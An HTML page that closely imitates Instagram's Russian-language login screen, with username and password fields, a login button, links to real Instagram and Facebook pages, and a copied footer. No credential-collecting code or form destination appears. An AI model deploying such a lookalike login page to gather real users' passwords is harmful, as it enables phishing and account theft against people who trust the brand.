<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>Instagram</title>
        <link rel="shortcut icon", type="image/png", href="img/instagram-icon.png">
        <style>
            body{
                background-color: #fafafa;
                font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
            }
            img{
                width: 180px;
                margin-top: 3%;
                margin-left: 70px;
                border: 0;
                padding: 8px 0 16px 0;
                display: inline-block;
                margin-bottom: 10px;
            }
            
            .button:hover{
                background-color: #39a823;
            }
            .formoch{
                background-color: #fff;
                margin-top: 110px;
                height: 336px;
                width: 318px;
                display: inline-block;
                padding: 15px;
                padding-bottom: 25px;
                border: #dbdbdb solid 1px;
                margin-bottom: 10px;
            }
            .input{
                padding: 11px 9px;
                margin-left: auto;
                margin-right: auto;
                display: block;
                width: 249px;
                font-size: 12px;
                border-radius: 3px;
                margin-bottom: 5px;
                border: 1px solid #dbdbdb;
                background-color: #fafafa;
                font-weight: lighter;
            }
            .input:focus {
                outline: #dbdbdb;
                border: 1px solid #dbdbdb;
            }
            .truebutton{
                background-color: #b2dffc;
                width: 268px;
                display: block;
                margin-left: auto;
                margin-right: auto;
                color:#fff;
                font-size: 13px;
                font-weight: bold;
                padding: 8px 12px;
                border-radius: 4px;
                border:none;
                margin-bottom: 15px;
                margin-top: 15px;

            }
            
            .pass{
                text-decoration: none;
                font-size: 12px;
                display: block;
                
                color:#00376b;
                margin-top: 20px;
                
            }
            .pass:visited{
                color:#00376b
            }
            .passdiv{
                display: block;
                margin-bottom: 20px;
                margin-left: 112px;
            }
            .line{
                margin-top: 25px;
                margin-left: auto;
                margin-right: auto;
                width: 268px;
                border-top: 1px solid #d0d0d2;
            }
            .underform{
                margin-top: 20px;
                font-size: 14px;
                margin-left: 56%;
            }
            .underhref:hover{
                text-decoration: underline;
                color: black;
            }
            .underhref{
                color:black;
                text-decoration: none;
                font-weight: bold;
            }
            .underhref:visited{
                color:black;
            }
            .gooter{
                background-color: #fff;
                margin-top: 10%;
                display: block;
                height: 200px;
                padding-right: 115px;
                width: 1790px;
                position: absolute;
            }
            .footer{
                
                text-align: center;
                display: inline;
                height: 10px;
            }
            .ull{
                margin-left: 400px;
                width: 900px;
                height: 10px;
            }
            li:hover{
                text-decoration: underline;
            }
            #firstul > li{
                
                list-style-type: none;
                display: inline-block;
                font-size: 12px;
                margin-left: 4px;
                color:#8a8d91;
                margin-bottom: 10px;
            }
            li{
                list-style-type: none;
                display: inline-block;
                font-size: 12px;
                margin-left: 4px;
                color:#8a8d91;
            }
            .ull2{
                margin-top: 100px;
            }
            .ull2 > li{
                margin-left: 5px;
            }
            .line2{
                border-top: 1px solid #d0d0d2;
            }
            
            .divline{
                background-color: white;
                font-size: 13px;
                color:#8e8eab;
                position:absolute;
                font-weight:600;
                padding-left: 14px;
                padding-right: 14px;
                flex-shrink: 0;
                text-transform: uppercase;
                margin-top: -10px;
                margin-left: 130px;
                margin-right: auto;
            }
            .facediv{
                margin-top: 30px;
                display: block;
            }
            .facediv>a{
                font-size: 14px;
                font-weight: 600;
                color:#385185;
                text-decoration: none;
            }
            .fbmini{
                margin-top: -3px;
                margin-right: 8px;
                width: 16px;
                float: left;
            }
            .facediv>a:visited{
                color:#385185;
            }
            .formoch2{
                margin-left: 51%;
                background-color: #fff;
                padding: 15px;
                padding-bottom: 25px;
                border: #dbdbdb solid 1px;
                height: 23px;
                width: 318px;
            }
            .form2div{
                margin-top: 8px;
                
                text-align: center;
                font-size: 14px;
            }
            .form2div>a{
                font-weight: 600;
                text-decoration: none;
                color: #0095f6;
            }
            .form2div>a:visited{
                color:#0095f6;
            }
            .imgplay{
                margin-left: 3px;
                width: 135px;
                margin-top: 10px;
            }
            .imgplay1{
                width: 135px;
                margin-top: 10px;
                margin-left: 35px;
            }
            .playlink{
                
                text-decoration: none;
            }
            .mainimg{
                display: inline;
                width: 400px;
                margin-left: 30%;
                margin-top: 4%;
                float: left;
            }
            .imgdiv{
                margin-top: -2%;
                margin-right: 100px;
                height:100px;
                display: block;
            }
            .selector{
                display: inline;
                border: 0px;
                font-size: 12px;
                background-color:#fafafa ;
                color:#8a8d91;
                margin-left:40%;
            }
            select{
                background-color:#fafafa ;
                border:0px;
                color:#8a8d91;
                font-size: 11px;
                font-weight: lighter;
            }
            .copyright{
                font-size: 11px;
                margin-top: 30px;
                color:#8a8d91;
                text-align: center;
                display: inline;
            }
        </style>
    </head>
    <body>
       <img src="img/dsa.png" class="mainimg">
        <form class="formoch">
            <img src="img/insta.png">
            <input type="hidden" name="jazoest" value="2927" autocomplete="off">
            <input type="hidden" name="lsd" value="AVqU4IifHUY" autocomplete="off"><div>
                <div>
                    <input type="text" class="input" name="email" id="email"  placeholder="Номер телефона, имя пользователя или эл. адрес" autofocus="1" aria-label="Электронный адрес или номер телефона">
                </div>
                <div>
                    <input type="password" class="input" name="pass" id="pass"  placeholder="Пароль" aria-label="Пароль">
                </div>
                </div>
                <input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login">
                <input type="hidden" autocomplete="off" name="next" value="">
                <div>
                    <button value="1" class="truebutton" name="login" data-testid="royal_login_button" type="submit" id="u_0_b">Войти</button>
                </div>
                <div class="line"></div>
                <div class="divline">или</div>
                <div class="facediv">
                    <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%25221ohu26d1vrbijy9vfbi15v8yn11j7uhf2f06q2gfygj47ow6zz5%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Dru_RU%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D97944edf-d5b4-40a0-ba33-3023f95d0dc0%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%25221ohu26d1vrbijy9vfbi15v8yn11j7uhf2f06q2gfygj47ow6zz5%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252F%2522%257D%23_%3D_&display=page&locale=ru_RU&pl_dbl=0"><img src="img/fbmini.png" class="fbmini">Войти через Facebook</a>
                </div>
                <div class="passdiv">
                    <a href="https://www.instagram.com/accounts/password/reset/" class="pass">Забыли пароль?</a>
                </div>
            </form>
            <form class="formoch2">
                <div class="form2div">
                    У вас ещё нет аккаунта? <a href="https://www.instagram.com/accounts/emailsignup/">Зарегистрироваться</a>
                </div>
            </form>
            <div class="underform">
                Установите приложение.
            </div>
            
            <a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&ct=igweb.loginPage.badge&mt=8&vt=lo" class="playlink">
                <img src="img/apple.png" alt="appstore" class="imgplay1">
            </a>
            <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3DE96094F1-D313-4772-8C3B-41E326D66794%26utm_content%3Dlo%26utm_medium%3Dbadge" class="playlink">
                <img src="img/andr.png" alt="googleplay" class="imgplay">
            </a>
          
                <div class="footer">
                    
                    <ul class="ull ull2">
                        <li>Информация</li>
                        <li>Блог</li>
                        <li>Вакансии</li>
                        <li>Помощь 
                        </li>
                        <li>API
                        </li>
                        <li>Конфиденциальность
                        </li>
                        <li>Условия
                        </li>
                        <li>Популярные аккаунты
                        </li>
                        <li>Хэштеги
                        </li>
                        <li>Места
                        </li>
                        
                    </ul>
                    <ul class="ull">
                        <li>Красота</li>
                        <li>Танцы и выступления</li>
                        <li>Фитнес </li>
                        <li>Еда и напитки
                        </li>
                        <li>Дом и сад
                        </li>
                        <li>Музыка
                        </li>
                        <li>Изобразительное искусство
                        </li>
                    </ul>
                </div>
                <div class="selector">
                    <select>
                        <option value="0">Русский</option>
                        <option value="1">Afrikaans</option>
                        <option value="2">Čeština</option>
                        <option value="3">Dansk</option>
                        <option value="4">Deutsch</option>
                        <option value="5">Ελληνικά</option>
                        <option value="6">English</option>
                        <option value="7">English (UK)</option>
                        <option value="8">Español (España)</option>
                        <option value="9">Español</option>
                        <option value="10">Suomi</option>
                        <option value="11">Français</option>
                        <option value="12">Bahasa Indonesia</option>
                        <option value="13">Italiano</option>
                        <option value="14">日本語</option>
                        <option value="15">한국어</option>
                        <option value="16">Bahasa Melayu</option>
                        <option value="17">Norsk</option>
                        <option value="18">Nederlands</option>
                        <option value="19">Polski</option>
                        <option value="20">Português (Brasil)</option>
                        <option value="21">Português (Portugal)</option>
                        <option value="22">Svenska</option>
                        <option value="23">ภาษาไทย</option>
                        <option value="24">Filipino</option>
                        <option value="25">Türkçe</option>
                        <option value="26">中文(简体)</option>
                        <option value="27">中文(台灣)</option>
                        <option value="28">বাংলা</option>
                        <option value="29">ગુજરાતી</option>
                        <option value="30">हिन्दी</option>
                        <option value="31">Hrvatski</option>
                        <option value="32">Magyar</option>
                        <option value="33">ಕನ್ನಡ</option>
                        <option value="34">Français (Canada)</option>
                        <option value="35">Српски</option>
                        <option value="36">Українська</option>

                    </select>
                </div>
                <div class="copyright">© Instagram от Facebook, 2021</div>
            
    </body>
</html>